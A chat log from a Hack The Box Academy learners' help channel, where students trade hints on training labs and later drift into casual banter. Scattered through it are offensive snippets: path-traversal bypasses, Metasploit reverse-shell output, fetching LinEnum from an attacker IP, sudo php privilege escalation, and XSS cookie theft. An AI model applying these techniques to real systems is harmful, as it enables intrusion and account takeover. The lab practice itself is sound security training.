I know how to decode in burp and zap, I just have not been having success
@raven cairn do you mean Web Proxies?
Yes lol
I had trouble with this and just used Cyberchef
yes. dm if you still need help
don't use zap
Zap is FOSS tho.
I like burp better as well, It just seems easier to use to me. But to each their own
B U R P B O Y S
when I use firefox it keeps trying to make my ips go to https, how can I avoid that?
@vital bough you might need to specify http when entering the URL into the browser
Not sure if there is a firefox setting or anything like that
I'll try that
Can anyone help me with the Nibbler part of the 'HTB Academy - Getting Started'
Is there anyone that have done the HACKING WORDPRESS?
Where are you stuck?
Yes, where are you stuck?
Anyone able to help with Footprinting Hard Lab, I am on the last step I think and just need a pointer
I managed to finish it, but I'd like to understand why does the ending part not work for me where I have to run ./monitor.sh
I did all the steps, but every time I try to run ./monitor.sh, I get: nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
'unknown': I need something more specific.
@tiny ledge i get that same 'unknown' error but i am still able to catch a root shell
not sure if it matters but i did the entire file path to monitor.sh
Weird! My nc didn't catch anything for some reason, I managed to solve it by recreating the folder completely and making monitor.sh run a shell for me with /bin/bash
Anyone able to help with Footprinting Hard Lab, I am on the last step I think and just need a pointer
feel free to dm me
Try nc 167.172..52.221 32339
Could someone help me with question 2 of footprinting SMTP? I believe my command should be correct or close, but it returns no results.
without :
nc 167.172..52.221 32339
you da man, thx
I am guessing my scan parameters must be wrong
feel free to dm me
zap is for gigachads
Burp -gt zap
For 'Password Attacks' - 'Network Services' could someone give me some good username and password lists. I'm using some from SecLists and am unable to get anything.
Web attack, bypassing security filters. I have intercepted the requests and have tried every HTTP method but am still not having success. I don't know what is wrong.
@raven cairn try right clicking in burp and changing the request that way
Working on File Inclusion - Basic Bypasses and I feel like I have tried all examples in the section. I see how the current path is functioning but my commands still do not seem to be working for me. Any hints would be great
@slow ruin make sure your url includes index.php?language=languages/
hmm I have been trying all my commands in that fashion I know there is a ton of ways to path truncate does it matter which one we should be using?
using two slashes and four dots should do the trick
holy moly idk why I was adding an extra slash which was goofing it all up?! lol thanks @west canopy
Thanks. This helped me to get the flag.
@unreal sigil
When you run the smbclient command to connect as the Bob user, is it prompting you for a password?
backslash instead of forward slash?? windows style???
@odd shore That's probably it. Nice catch
omg lol yeah it was the slashes lmao thx
Has anyone completed 'Password Attacks' - 'Network Services'??
im on modules doing linux fundamentals under Service and Process Management, when i enable the ssh.service its says its running fine then when i reboot and do systemctl list-units --type=service it says sslh.service active: failed sub: failed. What did i do wrong
I'm doing Getting Started. Trying to connect to smbclient as the Bob user, I do not know what the password is. I tried Welcome1, was I supposed to learn how to hack passwords somewhere else?
@maiden spindle did you ever get any help with that one?
is HTB good for general computer learning ie. Linux etc or just hacking
hey guys does anyone solve the 2nd question of [Information Gathering - Web Edition][Active Infrastructure Identification]?
the question is Which CMS is used on app.inlanefreight.local? (Format: word)
it is joomla but when i submit it , it gives me wrong answer
solved! you should use with !
the password is already correct. how did you try to access SMB?
Can anyone help me with the port I need to use in - Getting Started - Knowledge check, I'm trying to use Metasploit to get reverse shell to Getsimple site
Started reverse TCP handler on 46.101.2.213:4444
10.129.42.249:80 - Exploit aborted due to failure: unknown: 10.129.42.249:80 - Upload failed
Use the ones supplied in the resources section. You may have to create a mutated list though
There are other platforms for that
I think I've learned most of my Linux by doing these, so it's a good start atleast
You only have to set RHOSTS and LHOST.
RHOSTS = Your destination address
LHOST = Your VPN IP address (tun0 in your own VM) / IP address from your pwnbox
Thanks I got it! Any tips how to escalate privileges after I get in as normal user, cant find similar .sh files to the earlier assignment
Run a script such as LinEnum or LinPEAS to assist with finding common local privilege escalation vectors.
Thanks, any idea how can I go from meterpreter to proper shell? meterpreter > wget 10.10.14.106:8080/LinEnum.sh
[-] Unknown command: wget
shell
Thanks! Never used this before
Hi all, I've just noticed that I now have to re-do some of the LFI module as it's been updated. I've gotten completely stumped on the "basic bypasses" page...I have tried everything mentioned in this section including the new content. Anyone got any tips?
To be more specific, I've tried bypassing simple removal of path traversal, url encoding, starting with the languages path to get around the Illegal path issue, and truncation...and mixtures of all of the above
EDIT: figured it out after several hours...my hint for others is to keep it simple and make sure you include plenty of upward file traversals to get to root!
Can someone give me a heads-up what to do with this information: [+] Possible sudo pwnage!
/usr/bin/php
It's supposed to help me escalate to root privileges, but can't seem to understand how
It's obtained from: LinEnum.sh
comparing this to the example in the instructions, we last used the same tactic, but the file was monitor.sh where we wrote it to /bin/bash, but does not seem to work here
Have you checked GTFOBins?
check https://gtfobins.github.io/ for a solution
Thanks both, I'll take a look @acoustic owl @rustic sage, got the flag! The GTFObins was a real eyeopener, haven't checked this one before, this will help so much in the future
Hi, has anyone finished the final assessment of the server side attack module? can't find where to start..
What was shown in the module does not really help you here.
Look into the source code. Also take a close look at the included files.
I'm trying to complete it, but what do you mean?
Start with the allowed path, then traverse up a bunch...I think I used ....// also. Don't need any of the truncation stuff. Don't think I needed url encoding either
Is the flag in /flag.txt?
Yep
Broken Authentication Bruteforcing Passwords
If I understand correctly, grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep -E '^.{8,12}$' is not correct and needs to be padded? since the password policy includes numbers that the grep command does not include. That is, the policy allows the word "qW1, Qw1,1qW", but this filter incorrectly selects words from the list?!
is this filter correct?
grep '[0-9]' rockyou-50.txt | grep '[[:upper:]]' | grep '[[:lower:]]' | grep -E '^.{3,12}$'
Broken Authentication Bruteforcing Usernames /question2/.
I can't figure out where to look!
I'm also stuck on Bruteforcing Passwords. But for the brute forcing question2, even if I haven't found the answer yet, look at the send post. It sends some data that you can use.
look in the intruder in burp?
yes or in the developer tools network
and how to filter a word in a burp from an outgoing request for thousands of words?
watch manually one word at a time?
In the options you can filter for a word under Grep-Match section.
Ok, everyone. I am having problems with the Web Requests Module. More specifically, I am having trouble with the GET request part of the module
Here is the question: "The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag."
I used the browser devtools and I looked at the request tab in devtools, but there wasn't anything interesting to see there.
Did you read the Hint?
Don't forget to set the user credentials when you send the 'search' request
I authenticated in my web browser. admin:admin@Server IP:Port
ok, if you are searching for anything, what is the URL?
Do you mean the Get request?
yes
I get the http://Server Port:Port/search.php?search=Manchester
I mean: http:// server ip: port/search.php?search=Manchester
Manchester is just the term I search for.
Correct
Now look for which term you need to search and build the cURL query.
Remember that you have to log in first.
Well, I have the filename /search.php, which is the backend server that searches for the results. My search item is Manchester. This is all in the Get Request
Yes, that's all you need.
Now you only have to search for the word that was given to you in the task.
Can anyone help me with the BROKEN AUTHENTICATION module? I'm stuck on Bruteforcing Cookies. I tampered with the cookie, but the flag doesn't appear.
It's unclear! I want to manually create a list, which I will then encode in md5 and compare with the token. $token = md5($username . $time); total we know name= htbuser. and the time is known=13:31:33. $time = intval(microtime(true) * 1000); how do i turn time into $time ?
Predictable Reset Token
do you just need to multiply seconds by 1000 (33*1000) or is microtime hours+minutes+seconds?
academy.hackthebox.com is currently down for me (HTTP 502 on the host according to Cloudflare).
Same here...
Aaaand back it went.
I need some help
Module: File Inclusions-->Section: Automated Scanning
@quaint marsh DM me.
ok
I am having issues with Footprinting MYSQL, the prerequisites mentioned do not download, the nmap scan will not work, and I cannot use mysql command at all. Does anyone know what I could have wrong? I have found workarounds, not sure why what was suggested does not work.
I'm trying to work through the SQL Injections module, but I can't connect to any of the docker instances which spawn. I've tried resetting at least 10 times, and connections are either refused or timeout.
Good afternoon! Can you please tell me where to go?
Password attacks:Finding Credentials in Linux
The best is to talk to the HTB support team. Chat bubble bottom right
Are you trying from a pwnbox or from your own VM? It takes 30-60 seconds for the instance to boot up, because it's a mysql server
Tried from both. Eventually it connected, but it took much longer than 60 seconds. Around 5 minutes actually so I guess I just needed to be a bit more patient
Will look into it to make it faster
hey guys, who can help me with Web Request Module?
I'm having some troubles with PUT API Method
Somebody help me about "DnsAdmins" module. I upload the dll and add the netadm user in the correct group, but I have not access to the flag file.
@tight mesa that's the final section right? I had to go through all of the steps. Rename a city to "flag", delete HTB_City and HTB_New_City, and then i was able to curl "flag" to retrieve the answer
@glad orbit I had to use a reverse shell dll in order to get the flag. I still need to try it but you might be able to right click and launch CMD as as administrator and use the netadm user and get the flag that way (after it's been moved to the administrators group)
Hi, I have currently finished the introduction to networking module, I was trying some stuff on my own and I am having some doubts.
Could I ask anybody?
dm if you still need help
Anyone?
Hey I have some trouble solving PHP Web Shells on the **SHELLS & PAYLOADS** module
I cant use correct the burpsuite
anyone that can help me?
hey i am stuck at LFI module can anyone correct me?
I can try
I havent looked at the updated module and the notes I have are on the old module.
I will try to help you
guys, im losing my mind. has anyone else had mad problems with downloading crackmapexec on the htb machine
im getting so many errors with every method i try
Tried that: #modules message ?
@unique saddle
Thank you so much.
You're very welcome
HTB is typically very difficult for beginners.
Can you explain me how this command work
I think THM has a lot of information but isn't as "hands on" or as challenging as HTB. Personally I have not used THM but i know it's popular.
I stick to HTB
Hello in the module Command injections and the sections Detection we must answer the question with a english phrase(the error message).
it's cool but not all of the users of HTB use a browser in english.. it's not a really important problem but i think it can be improved !
@fierce atlas maybe mention it in the #858470491676737536 room
@west canopy yep i move my message
Are we supposed to find a hash first?
(Password Attacks)
If so, I can't seem to find it.
I keep trying the password I use to log into my HTB account but it's not working
Is it supposed to be that or something else
Check the credentials file on your desktop
desktop meaning the pwnbox?
Yea
got it, i see it
thx so much
hey, i have problem with submitting the answers in HTB academy, im now in WEB REQUESTS module in bugbounty path and i have the correct answer but keep returns with WRONG ANSWER , what should i do in this case?
Make sure you don't have extra spaces before or after your answer. The web app isn't designed to strip them when you press submit
I can help you if you still have doubts
Anyone complete the question for this section? Need help
Send a GET request to the above server, and read the response headers to find the version of Apache running on the server? (answer format: X.Y.ZZ)-------------- this is the question as we see we have e.x also for the answer so i tried to put in different ways and looked for youtube but still gives me WRONG ANSWER
Hi, has someone finished the final assessment of Session Security? I think I managed to do what is suggested in the hint, but i can't verify because i don't know the admin mail address... Am I on the right track?
I'm stuck on the question 2 of Predictable Reset Token. Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag?
I've found the correct algorithm but after i'm stuck.
@knotty hemlock I was able to solve it by using the exact same technique from the "Session Hijacking" section of Cross Site Scripting module.
Once you get XSS set up on julie rogers profile, you can use the API endpoint to make the admin user visit her page, which lets you steal the admin cookie.
anyone having any issue getting to their target on pwnbox? I've tried on firefox and bash, I've tried closing reopening and trying again, I've tried resetting, terminating, I even restarted my computer
what module/section is that?
@unreal sigil I think it's an issue with Docker targets, usually i have to spawn them four or five times before they actually boot up.
bug bounty path , web requests section
ok thx
its not the first time and im losing cubes and when im done with module it cant be submitted as done!
@proud sparrow
i know how to get the version and for me its 2.4.29
Hmm maybe there is some variation with the Docker targets. I was having a similar issue on the LFI module and they ended up changing the question because different docker instances would give different results.
yo also for me in LFI i had issues also
thank you, got it but i was so proud i got the csrf token... i wonder if there would have been another way using that one. anyway, thank you
My Chrome browser has been having no luck accessing htb websites. What could be the reason for that? Is it because I'm using chrome and should be using firefox? Thanks everyone!!
@swift trench Are you not able to access spawned targets, or not able to get to the HTB website period?
i need help im done tried alot but there is no way i can know,,,,any one? thank you.
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.------------i couldn't solve this one, what to do?
@proud sparrow you might need to refresh the page a few times. But it should load a flag which you can then curl
navigate to the target in your browser, right click and inspect element, select the "Network" tab and press reload then you should see it
@west canopy i was doing right but with domain in the examples not spawn ip, thank you tho , still i dont know how to put the answer the way it should be written
It's in the format HTB{something}, you can get it by navigating to the flag in your browser or use curl
wow! thank you man for directing me
help, with a step I can't get past because I don't know how to get the flag it asks for
Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'
I did everything, but I don't get
what module, section, question.
module: HTTP Fundamentals, section: Post and question: Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'.
http fundamentals???? That's not a module
@covert shoal you will want to do something like this, but search for "flag" instead of "london". Your session cookie might be different so replace it with whatever your cookie is after logging in as admin:admin
Web Request im guessing since it has a section named http fundamentals
ok, thanks
when performing an nmap on target do you leave it like this "161.35.47.235:30450" or change the numbers after the ":" or what
cause I'm not getting anything when I run it
It opens the page on firefox tho so I'm not sure why my nmap isn't giving port results
it would be like: nmap 161.35.47.235 -p 30450
but usually docker targets don't usually have any other ports open so nmap typically isn't necessary, at least when it comes to Academy modules
you might need to add sudo and add the -Pn option
if you want to wait for the long scan you can do : nmap 161.35.47.235 -p- -Pn and let it scan every port.
@unreal sigil you actually don't need nmap for that section. You will want to take advantage of the wordpress plugin being used by the target (you will see it when access the target in your browser)
ok thx
I'm able to access spawned points and connect through Openvpn but I cannot reach the websites for some reason
on the active subdomain enumeration lesson for info gathering, doing the nslookup AXFR search doesn't give me any TXT records, and it looks like it also doesn't give me all the subdomains, considering the IPs of the FQDNs it asks for in other questions and the number of A records don't match. gobuster enumeration also didn't give me the other subdomains. anything i'm missing?
hey guys, i'm so stuck at the question
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
i have identified the exploit on msf and with searchsploit but when i try to run in msf i get
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
where is the result located? any ideas
have you been able to solve this? I've tried the username and password lists provided. I can't get in to any service. The module hasn't showed me anything about mutating passwords...
which module is this? i seem to remember having done this once
this is getting started - public exploits
oh yeah, so once you have the exploit you need loaded onto msf, do show options, and that should give you a set of options. find the options you need to edit and edit them accordingly, it should have the descriptions for them, see if that works
i have tried and it says its complete but i get no output
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
its supposed to make a file with the output right?
yeah, so make sure you're looking at all of the options. there's one in particular that gives you exactly what you need
that's my hint, make sure to read all of the options
@west canopy nothing to do. The user netadm is added to the administrator group but either by starting cmd as an administrator or with a reverse shell it still gives me access denied to the flag.txt
OK so you're on the Password Attacks - Network Services section right? If so, you should be able to get what's required using the username and password lists provided in the Resources section at the top right of the page, using the tools shown in that section of the module material.
I've got the same story. No matter what I send, it always says: "Check your mail"
hello there, i have a problem with the Recursive Fuzzing Task from the Attacking Web Applications with Ffuf module.
I went through the website with ffuf and got an HTB code but the website tells me it's wrong, what should I do? Or is this just a false flag?
this is no problem! in the ddt file specify the path to the file. but how to cause an error?
@leaden sail use HTB{CODE}?
I did
send me the flag in PM (I verify with my code)
Can i DM you?
Hi! how to trigger an error?
That's definitely weird that the reverse shell didn't work. The dns service runs with SYSTEM privileges, so catching a reverse shell via starting/restopping the service should result in a SYSTEM shell.
@jovial sun Yes, it should save the contents to a file
For Password Attacks - Network Services section, the Passwords for smb, ssh, rdp aren't in the provided List, so mutations wouldn't help, best try would be rockyou,... For the Rest of the Module you should use the Provided Resources.
i tried rockyou, but wasn't sure which users to use. It wouldn't be feasible to enumerate rockyou over several users
I have finally given up the hope of getting it on my own, would someone be able to give me a good nudge on footprinting easy lab?
@severe birch try connecting to the vsftpd port (2121) just like you would connect to ordinary ftp. From there you should be able to find a file that will allow you to SSH into the target
Would this be assuming the use of the hint? Or without it?
with the hint, you won't be able to SSH in without the username
Hi all, is there anyone who can help me with Web Service & API Attacks - Skills Assessment?
I can't find the attack point.
i think it should be the login parameters. But it doesn't work.
Can someone nudge me in the right direction
The service always hangs.
Yes, there is this hint that the service hangs, but how should I test if I really use the right parameter?
@acoustic owl DM me
hey im doing the network traffic analysis module and i have a general question, if someone has time to explain. the txt goes "By issuing the -nn switches as seen below, we tell TCPDump to refrain from resolving IP addresses and port numbers to their hostnames and common port names." my question is why is it important to refrain from resolving ip's and port numbers?
I'm just throwing a guess out there but it may cut down on the time for the program to execute.
ah... probably becomes more apparent the further you get into the course.
Having some trouble with File Inclusion - Automated Scanning.
I fuzzed the web application for exposed parameters but when testing them none seem to be working. Granted I am getting a ton of exposed parameters. Could I get a nudge on this?
@slow ruin Look for FFuF outputs with a size of 3309, as opposed to the ones with a size of 1935
I am getting all sizes = 2309 granted I am looking at the default /index.php?language=FUZZ. Not sure if I should be using language or another parameter
right you need to fuzz the parameter name first. It's actually /index.php?view=FUZZ
yea just found that out notice view was a different size to all the others
Could someone give me a nudge for the footprinting hard lab? I feel totally lost. I've seen a hint from someone previously but I still don't know what to do with that.
I have a couple of minutes if you want to DM me I can try to help
could anyone help with the medium lab in network enumeration w nmap? thanks!
not sure what I'm doing wrong here for cracking into htb > getting started > public exploits module
@unreal sigil for RHOST you just want the IP address and no port. For the port, you want to set that as RPORT
@distant crag For medium lab I had to use the pwnbox to get the answer. Try doing nmap -A
@unreal sigil
@west canopy it doesnt bring up anything that looks like dns info
@distant crag DM me
Here is the url so everyone can give jared respect on HTB after he helps you. He is the MVP of this chat.
https://app.hackthebox.com/users/855781
awww shucks
Hello. I am starting the academy module "Web Requests", and I have a question about something on there. Is there supposed to be something else where I have circled on this screenie, or no? It looks like a broken link to me. TIA!
same here too.
@low gyro Image is loading OK on my end.
Maybe try different browser?
Thanks for the pic. Well, I have tried Firefox and Edge on my LMDE laptop, and I have also tried FF, Edge, and Chrome at work. I'll install chromium here on my laptop and see if it's visible.
I'm using Brave browser at the moment
weird - same with chromium
On another note, why build more password attacking mods?
So far the info isnt that different than the other two and the pain is still here
gonna reboot into Windows, see if it's a Linux thang...
I am only 3 sections in but
you like the abuse
I came from the retired box to take a break from getting my ass kicked
I want to be on my death bed, waiting for a password attack to finish
and i will tell my grand children, when i die, i need you to try rockyou-50.txt
lol at this rate I might actually have grandchildren before this cracks
It could be a cool drama scene: a nuke is about to come in from orbit and the only way to stop it is to crack a password and divert it via satellite
nope. same results as with Linux. Image links are broken - for ME only
If you crack these passwords for me I will do whatever you are stuck on
lol
Yea the password attack thing. I don't know man. I don't think ive ran into a box yet where I actually just straight brute forced credentials.
like usually you find credentials hidden somewhere and re use a password or something
but never just straight using hydra
while doing boxes i have used rock you a couple times, almost always on hashes that crack instantly
yea cracking hashes with rockyou is pretty standard
but like trying to bruteforce SSH credentials never works
agreed tho, i feel like if you are relying on brute forcing you are doing something wrong
lol for real tho
And how many common applications let you just try to brute force without blocking your ip?
okay here's what I notice. When I click the "Continue" button on my dashboard, it takes me to https://academy.hackthebox.com/module/35, where the image links are broken. However, if I then click on the "HTTP Requests and Responses" link on the righthand side of the screen, that takes me to link https://academy.hackthebox.com/module, and on there the images load just fine.
lol that is interesting the /35 loads with images for me and /module link tells me this method is not supported
maybe send this over to #858470491676737536 ?
you are prolly way cooler than me, s'the only explanation I can come up with
you should add that to the erratum post, the mod can detect coolness
Add that picture too
Finally title it =ICE COLD=
This is a known issue. We're working on it
oh. I just submitted to #858470491676737536. Should I delete it then?
How exactly is the mod able to detect if a user is Ice Cold?
I did forget the Ice Cold part, so they'll prolly just shitcan it anyway ;-P
Notice how i added it here and got an insta response
1) noticed, and 2) stolt that shit for future usages
lend me some suga i am yo neighbor
SHAKE IT
well, it doesn't seem to work as intended when asking the wife to get up and make me a sanwich...
but I did get an insta-response!
*sammich
Then what makes, then what makes what makes, what makes Love the exception?
lol me too
Stankonia
ah yea speakerboxx/love below
didn't the other guy write all of Andre's lyrics or something
big boi?
no
may have been the other way around
I dont think so they both had unique styles
3 stacks is my favorite rapper
icy hot stuntaz
gator boots with a pimped out gucci suit
Andre 3k is very underrated. The man is a legend on the mic.
I feel the same about Black Thought from The Roots
I dont know if he is underrated anymore, didnt he win an oscar and a grammy in the same week?
But ya it took a while for people to recognize